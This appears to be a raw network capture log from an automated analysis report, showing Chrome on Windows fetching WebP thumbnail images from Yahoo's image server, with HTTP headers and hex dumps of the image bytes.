                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 67 74 66 bc 0d 66 d3 44 13 ed 94 cc 7b 88 35 e1 e6 12 e1 94 db 70 65 ba 58 aa e4 16 4d 11 54 f6 53 4e ac 96 9c e8 d6 0f 2b a4 1d dc ea d3 86 e3 14 8a 15 1c d2 db 4d f5 6a 80 f9 c6 b4 02 ca dc ff ec 1d af 9c ef a4 f2 e8 9c d9 96 b2 86 38 4a cd 6d 87 c7 c9 24 0e 41 b0 0f 2b 99 67 24 fa 5f 96 ff c6 8c 47 47 49 42 f2 9b 81 a6 d0 5d 09 c3 e1 bf b5 1e 27 17 5f 5b 68 fe 8f 73 e2 89 d7 a1 5e e4 45 1f 68 12 8c c1 37 92 e7 c1 b4 e3 95 49 d2 dc 24 a1 b6 66 e4 d1 08 40 d5 71 34 9b fd 1b ec 54 4b 9f 95 9e f8 02 5e 77 55 7c 6d 35 3a b1 b5 55 b7 31 c4 8d 6f 3a c3 c5 8e 67 75 46 06 6d b1 8b 9d b7 be bc fa 63 2c 18 86 2f f3 dc 7c c4 5f f5 96 73 d4 3d ea 46 08 9e e9 53 96 b0 42 6a 8e be ad 80 c7 f8 b6 f8 53 a1 f2 68 18 48 8e fd 5a 01 98 5d 33 74 26 82 d1 9b 24 d5 74 f1 4d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gtffD{5peXMTSN+Mj8Jm$A+g$_GGIB]'_[hs^Eh7I$f@q4TK^wU|m5:U1o:guFmc,/|_s=FSBjShHZ]3t&$tM


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              40192.168.2.45106287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC763OUTGET /uu/api/res/1.2/r8TW9c47hyxw22EECsC9Qw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/3e3ed6c0-859d-11ef-b251-e700ef1e3219.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 13284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="3e3ed6c0-859d-11ef-b251-e700ef1e3219.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "30c27c2ae036d942104e83a7abb72537"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expiration: expiry-date="Mon, 07 Apr 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 17:49:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 17:49:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=27;cpu=0;start=2024-10-08T17:49:17.933Z;desc=miss,rtt;dur=91,content-info;desc="width=356,height=180,bytes=13284,owidth=5829,oheight=3279,obytes=1287633,ef=(1,13,17,23,30)",cloudinary;dur=19;start=2024-10-08T17:49:17.936Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-request-id: 045bfe3a40868cc7c3706ddb35eece7e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 5058
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_cache: miss
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: 045bfe3a40868cc7c3706ddb35eece7e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 52 49 46 46 dc 33 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 20 00 00 00 63 01 00 b3 00 00 49 43 43 50 48 0c 00 00 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RIFF3WEBPVP8X cICCPHHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 01 e1 01 e9 01 f2 01 fa 02 03 02 0c 02 14 02 1d 02 26 02 2f 02 38 02 41 02 4b 02 54 02 5d 02 67 02 71 02 7a 02 84 02 8e 02 98 02 a2 02 ac 02 b6 02 c1 02 cb 02 d5 02 e0 02 eb 02 f5 03 00 03 0b 03 16 03 21 03 2d 03 38 03 43 03 4f 03 5a 03 66 03 72 03 7e 03 8a 03 96 03 a2 03 ae 03 ba 03 c7 03 d3 03 e0 03 ec 03 f9 04 06 04 13 04 20 04 2d 04 3b 04 48 04 55 04 63 04 71 04 7e 04 8c 04 9a 04 a8 04 b6 04 c4 04 d3 04 e1 04 f0 04 fe 05 0d 05 1c 05 2b 05 3a 05 49 05 58 05 67 05 77 05 86 05 96 05 a6 05 b5 05 c5 05 d5 05 e5 05 f6 06 06 06 16 06 27 06 37 06 48 06 59 06 6a 06 7b 06 8c 06 9d 06 af 06 c0 06 d1 06 e3 06 f5 07 07 07 19 07 2b 07 3d 07 4f 07 61 07 74 07 86 07 99 07 ac 07 bf 07 d2 07 e5 07 f8 08 0b 08 1f 08 32 08 46 08 5a 08 6e 08 82 08 96 08 aa 08 be 08 d2 08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &/8AKT]gqz!-8COZfr~ -;HUcq~+:IXgw'7HYj{+=Oat2FZn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 78 cc 79 2a 79 89 79 e7 7a 46 7a a5 7b 04 7b 63 7b c2 7c 21 7c 81 7c e1 7d 41 7d a1 7e 01 7e 62 7e c2 7f 23 7f 84 7f e5 80 47 80 a8 81 0a 81 6b 81 cd 82 30 82 92 82 f4 83 57 83 ba 84 1d 84 80 84 e3 85 47 85 ab 86 0e 86 72 86 d7 87 3b 87 9f 88 04 88 69 88 ce 89 33 89 99 89 fe 8a 64 8a ca 8b 30 8b 96 8b fc 8c 63 8c ca 8d 31 8d 98 8d ff 8e 66 8e ce 8f 36 8f 9e 90 06 90 6e 90 d6 91 3f 91 a8 92 11 92 7a 92 e3 93 4d 93 b6 94 20 94 8a 94 f4 95 5f 95 c9 96 34 96 9f 97 0a 97 75 97 e0 98 4c 98 b8 99 24 99 90 99 fc 9a 68 9a d5 9b 42 9b af 9c 1c 9c 89 9c f7 9d 64 9d d2 9e 40 9e ae 9f 1d 9f 8b 9f fa a0 69 a0 d8 a1 47 a1 b6 a2 26 a2 96 a3 06 a3 76 a3 e6 a4 56 a4 c7 a5 38 a5 a9 a6 1a a6 8b a6 fd a7 6e a7 e0 a8 52 a8 c4 a9 37 a9 a9 aa 1c aa 8f ab 02 ab 75 ab e9 ac 5c ac
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: xy*yyzFz{{c{|!||}A}~~b~#Gk0WGr;i3d0c1f6n?zM _4uL$hBd@iG&vV8nR7u\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 69 7c 13 25 83 bf ca 37 ae 09 71 81 ca dd f4 df e4 f8 ec eb 78 6d 12 82 12 59 b0 3c ac b7 1d a1 dd cf 49 99 8f 45 8a c1 58 29 cb 76 d6 af 70 bb 02 ea 17 97 05 57 88 1e de 2a 3d 7c 37 4c 0e 97 01 0b c4 bc 27 4d 9b 33 45 c1 aa 56 a0 86 7c fc 79 02 33 e1 03 9c 25 3b 73 e1 89 23 49 c1 e8 d6 84 37 2d 78 79 b3 63 8f 8b c7 bf 47 98 6e ec e5 e3 fa bc 5b 78 68 84 8a 21 c5 99 be 10 d8 f1 bd 42 9e 0e e3 74 d5 db f6 4e 6d 6e d7 00 81 71 f5 43 8c 44 fc f4 bf 9a 9e e6 1a 76 ba 41 d1 ed bf 65 3d dc ca d8 30 a2 de 72 c0 b4 0e 06 c5 97 bc da 4c eb 75 f9 74 bd 41 ab a4 9f 09 8a 63 1c 27 cd 10 d2 43 e0 e5 7a f2 63 58 14 52 1a 3c ee b0 8b e6 36 6b 89 e7 65 8c e2 b8 c0 3e d9 f1 96 bd 2e 0e 48 f1 f7 58 d1 c1 3a 5c 85 25 a1 c9 e7 72 16 66 31 64 90 02 5d 73 6a d1 f0 e6 80 ca e3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: i|%7qxmY<IEX)vpW*=|7L'M3EV|y3%;s#I7-xycGn[xh!BtNmnqCDvAe=0rLutAc'CzcXR<6ke>.HX:\%rf1d]sj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: fc 67 b1 65 47 68 d3 14 28 02 38 a9 32 32 15 41 55 a8 19 51 ae ae a9 df 22 6d 5e 25 79 55 43 f8 a0 7c 8c d0 81 8a 0a 6b a7 5d d2 a2 a9 a4 2f 6e a6 4d 4c ee 87 a6 31 d6 83 8c b2 04 fe 67 b2 28 72 36 03 bf d2 92 b6 e5 f7 e8 a5 2a 03 5e 82 3b fe 13 fa 11 ec cf 1c 35 55 d7 69 a3 14 a8 82 fb a2 7b 56 f2 d0 5f 10 9f a9 db 06 f2 2d 20 f9 47 ff 3e 68 23 53 ba 58 0f 2f 3a e1 f2 4f a9 21 db 97 1f b9 ab 9f f0 d9 cb d8 b9 01 d1 e1 54 25 cf 08 3e 1d 20 00 0f ce ff 3a 16 a9 4c 00 8f 3e 08 77 85 a1 4f d9 09 8f ff a3 e9 0f a1 ce a7 75 e1 84 6d 75 e6 43 8d 7d 0e 1c 87 e5 98 1b 5b 76 5e 88 f2 d4 f7 5d fc 89 79 8e cd c4 dc 64 01 19 09 36 08 c2 b1 5e 00 36 a6 f0 46 8b df f5 74 bb 85 40 06 b2 69 31 cc 8f 70 00 71 f3 f2 4a e7 f1 83 61 8c 0d d3 8f a2 77 91 6c f9 af 5b 99 ce 48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: geGh(822AUQ"m^%yUC|k]/nML1g(r6*^;5Ui{V_- G>h#SX/:O!T%> :L>wOumuC}[v^]yd6^6Ft@i1pqJawl[H
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 78 67 1f e3 8e 9e 08 1c d7 a3 51 fc 9b 56 d5 02 6a 0a a5 58 5f bb e5 49 64 39 18 1d 77 52 2d 54 57 0f 7e f8 70 42 7c 48 d7 c7 59 c2 9a 59 36 0e 1b 8a 98 3b de 6b 78 94 be c0 7b 48 ed 34 66 8f 01 dd ca 31 69 8b c5 18 63 15 71 63 a7 ff 19 93 8a 8b 21 0d e3 21 f1 0f f4 37 39 01 49 7d e9 32 83 a5 af 60 17 d9 9a ab b9 29 6c 63 c1 4a 98 33 a8 07 37 a3 62 ab 18 2f 7d 2e 6d 54 b4 0b 74 10 9a bc 28 2a 37 ad ef aa 7c 77 e8 c0 1c ea b0 ff f1 13 54 fa ed b4 9e 7a 29 e4 d6 8f e0 72 2e 25 7b 4f 41 5b 10 6a a6 57 54 c0 76 56 f3 1a ce 9e 14 d0 67 db 9c 3c 9f 98 f8 6a ef 87 1d f2 59 8f b3 8b 49 72 db 02 e4 73 83 7f 96 e6 12 bb 6f a2 cf 26 fe 8b a7 c3 69 7b 04 94 c3 b1 62 2b ca af 86 ef 45 75 80 8e f3 41 32 6a 47 3a d5 80 2f b4 49 9b 4e 4d 12 0a 9a 80 e3 4c 73 6f 8f 5f fe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: xgQVjX_Id9wR-TW~pB|HYY6;kx{H4f1icqc!!79I}2`)lcJ37b/}.mTt(*7|wTz)r.%{OA[jWTvVg<jYIrso&i{b+EuA2jG:/INMLso_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 3a 1d 81 7d 1d 93 05 ed f0 9d c9 50 26 ac b0 50 b0 e6 ac b0 8b 4c 7b 54 55 09 9d c8 46 fb 92 34 86 44 1c 79 af ca d7 86 4e c7 a4 89 9d 98 4e 68 a4 c0 1c 85 4f 0a f9 52 80 f8 fd 5b 47 94 8f fc 3e bc c4 86 d5 6f dc b1 03 15 af df 1d 0f b2 e2 c7 33 4f 4e b4 09 38 15 eb de 7a 76 f5 c4 eb 34 97 7a d5 90 75 2e cc 3e 90 c2 1a 85 73 3e fb 86 58 e0 fa 10 c7 e5 64 b9 a9 ca 40 1e 05 bf d1 16 77 e3 bf 8d 12 09 c6 ef 65 c0 2b 41 f4 8a ce 7f cf 33 54 ff 4f 82 86 4b e8 be 24 72 53 e1 e2 db b2 9c da 3b c9 0f 27 10 f7 a1 fe 6c 7c 3d 89 3a eb f5 ad 9c ba d1 b5 9f 51 fa 23 8d 38 bd 42 d9 79 0b 52 e9 ec fd 3a 08 8b 74 70 66 b7 4b 26 30 db d6 39 ae 07 12 17 8d ee a2 2b c3 61 a4 bd 84 5a 39 95 df d9 8b c1 f1 c6 bc 86 91 df c4 34 e8 06 f4 fb ef d1 32 b1 4b 06 fe 3e 21 78 9d c0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :}P&PL{TUF4DyNNhOR[G>o3ON8zv4zu.>s>Xd@we+A3TOK$rS;'l|=:Q#8ByR:tpfK&09+aZ942K>!x
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: b7 9a 5e 0b cd ff 5e 15 7d 2b ed e4 d9 92 32 06 92 b6 08 8c b4 54 13 12 03 7f c1 e3 7c 25 35 f0 27 96 19 b1 f6 56 a9 1e 98 ac a9 d9 8a e1 47 f9 58 58 92 b7 2d 63 51 0f 02 2f 4d 9b 56 89 14 dc 8b a6 23 9d de 6e 77 9a 91 c7 20 d1 84 35 5e fb 04 dc d6 de 55 94 08 d5 f1 1e bd 89 fc 60 50 99 f9 93 e5 cc a6 58 68 33 2b 8d fb 93 97 50 7c 8b 31 e8 7d fe 0f f2 e0 24 ee 8e e7 59 e4 d9 c7 ed 26 ea 66 89 20 ce 75 a9 a7 83 58 5b 0c 96 8a fe 7f 52 d6 8e 97 1e 7e 05 88 ef 08 56 02 1a 12 ca 9f 85 ce 2f 7a de 28 5d fc 26 bd fe e7 db bf d9 af 78 0a 2d dd 6b 25 c6 32 90 bd 85 4e f9 fb d8 e4 14 75 be 56 91 8d 00 c2 0c ee ab cf a2 e4 67 04 e6 86 12 c6 5a ad 1f 11 c5 c9 bb 01 cd b9 2a 72 15 16 99 0a 5b d5 98 f6 eb c8 6d 0e d7 76 bb 5c 78 e3 08 16 e0 91 f1 36 7d b1 a0 25 84 d5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ^^}+2T|%5'VGXX-cQ/MV#nw 5^U`PXh3+P|1}$Y&f uX[R~V/z(]&x-k%2NuVgZ*r[mv\x6}%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: ab 49 53 b9 e6 dc cc 4f e0 03 f7 ca 94 d8 bc ac a3 75 c2 e5 40 4f 08 93 40 ed 88 d5 d1 cd d2 99 34 53 7c 89 ee 7c 42 67 3d d5 70 d2 1d af 65 d1 59 40 f8 e0 2a c5 ff 73 ac 1b 5d 89 a6 5e 46 84 c7 fe db c5 f8 a5 e0 f1 b2 57 6d 9e 51 b9 36 9e 53 f3 98 e4 40 da d6 46 b6 81 08 92 78 c8 7e f8 92 07 79 05 96 74 41 e1 0b 8b 5b df 57 d6 01 2d 42 bd 13 66 69 da dc c3 f4 d3 a6 2a 3a f5 15 1d d8 ab 69 12 fe 8e a7 e3 54 c6 18 c5 9f f0 f6 08 fe 22 1a a4 0a b2 6c e9 9c 42 63 89 24 5f 70 75 2a b5 f9 b2 e0 97 6c 85 24 a0 9e 6b 2d b0 b9 42 65 75 5c 83 ef 34 03 7b 7e 43 51 97 95 eb 28 4f 27 39 ce 87 8d b5 a5 35 bf 82 dc 5c 5e 48 8f f8 9c 26 d5 d9 24 0c fe cc e1 1e 80 5d 0d 12 b1 51 4a 71 ab e2 fa 02 51 5e 44 d2 99 7e e6 98 9d 6a 04 27 3d 65 60 a5 8e 7c e2 f8 26 78 44 53 0d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ISOu@O@4S||Bg=peY@*s]^FWmQ6S@Fx~ytA[W-Bfi*:iT"lBc$_pu*l$k-Beu\4{~CQ(O'95\^H&$]QJqQ^D~j'=e`|&xDS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: a4 94 37 d3 bd b6 7c 1a 66 fe bf 65 15 72 c3 15 ab 91 1e fa 13 78 f6 47 09 9c f5 0d d8 bf 04 2f 1a a1 1f db c3 99 d3 4c a1 0e cc 8a b2 d9 4c 27 f6 2d d6 4e 2b f4 15 a4 a6 41 42 67 06 11 ee e4 fb ea 25 b0 af 8a 3a b9 11 2c 7f 63 df 4f 9b 1e 0b 4e 7d 06 0b c6 27 07 e2 51 9a 43 07 43 50 1f 11 24 a0 bd 34 da d6 d7 bd 64 08 73 4b e7 50 69 01 1f eb 98 37 6c 5c 88 db 2d 9e 73 6d 92 1e fb 23 d7 14 a3 73 c6 16 48 1d 40 2e a3 e3 dd 53 ac 85 87 84 a4 63 c1 36 3a 36 00 b4 b5 ec d7 40 d5 5d 93 5f 34 cc f4 cb 53 00 e1 bd 95 1b 48 b3 6b 09 7f 85 74 a7 46 bd fd 2f ca 34 46 1f 9c 4b cb f9 73 96 2a a4 8b 8e 30 0f 58 80 43 58 90 38 ed ae 65 6e ad 33 41 da c7 8d 81 77 46 a5 ae 9a 30 88 9f 3c 7b bf 8d d1 ec 2a e1 8b 7f 21 97 d8 70 07 74 08 33 3d 98 f4 21 5e 5a 97 f6 c4 d4 c9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7|ferxG/LL'-N+ABg%:,cON}'QCCP$4dsKPi7l\-sm#sH@.Sc6:6@]_4SHktF/4FKs*0XCX8en3AwF0<{*!pt3=!^Z


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              41192.168.2.45105987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC763OUTGET /uu/api/res/1.2/LPQ_1T.gtbBgAzFw21rhGw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/aaa8fe20-85a3-11ef-b77d-220fee758bf5.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1086INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="aaa8fe20-85a3-11ef-b77d-220fee758bf5.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "9e530ae30640705b50966a2a28855386"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 18:32:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 18:55:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=2;cpu=1;start=2024-10-08T18:55:02.412Z;desc=hit,rtt;dur=86,content-info;desc="width=356,height=180,bytes=8060,owidth=5000,oheight=2815,obytes=757739,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-request-id: ee7f2e5062325b422f18be161ffb54bc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 1112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: ee7f2e5062325b422f18be161ffb54bc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 52 49 46 46 74 1f 00 00 57 45 42 50 56 50 38 20 68 1f 00 00 f0 8d 00 9d 01 2a 64 01 b4 00 3e 79 36 96 48 a4 a2 ac a1 28 13 4a f9 90 0f 09 4d c8 50 06 98 e5 f1 bf a0 da 92 f4 89 d7 27 d3 7e 28 f6 a7 e3 ff c4 f9 68 73 f7 fb cf b9 3f 95 ff f1 ff e3 7b 69 fd 03 fe b3 f3 ff e8 1b f5 d7 ce ab d7 ef 98 ff e8 5f e7 3f 68 3d dc bf e0 fe db fb b6 fe c5 fe b7 d8 03 fa 2f f5 8f fe de d6 bf f4 7d 9d 7f b7 7f d9 f6 08 fd d8 f4 dc fd d3 f8 6e fd ba fd bd f6 cc c2 2f e5 de 42 7a 93 fa 8f b9 1c f8 fb 03 cd 6f ba 72 36 48 36 e8 c8 06 fd 1b fa ff 9a 6f dc 79 c7 f5 d7 96 d7 c6 ff f0 7f f3 3d 80 ff 9c ff 98 fd 90 f7 8c ff 77 cc 87 d8 3c 13 cb 39 b7 45 c8 9b b8 e5 75 c0 f5 5b ab 51 c1 76 d0 7d 61 c8 f0 41 7f 3e 6d de d2 e0 76 57 71 51 34 52 85 52 4a 4e d6 b8 ea 5e 81 4d 36 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RIFFtWEBPVP8 h*d>y6H(JMP'~(hs?{i_?h=/}n/Bzor6H6oy=w<9Eu[Qv}aA>mvWqQ4RRJN^M6b
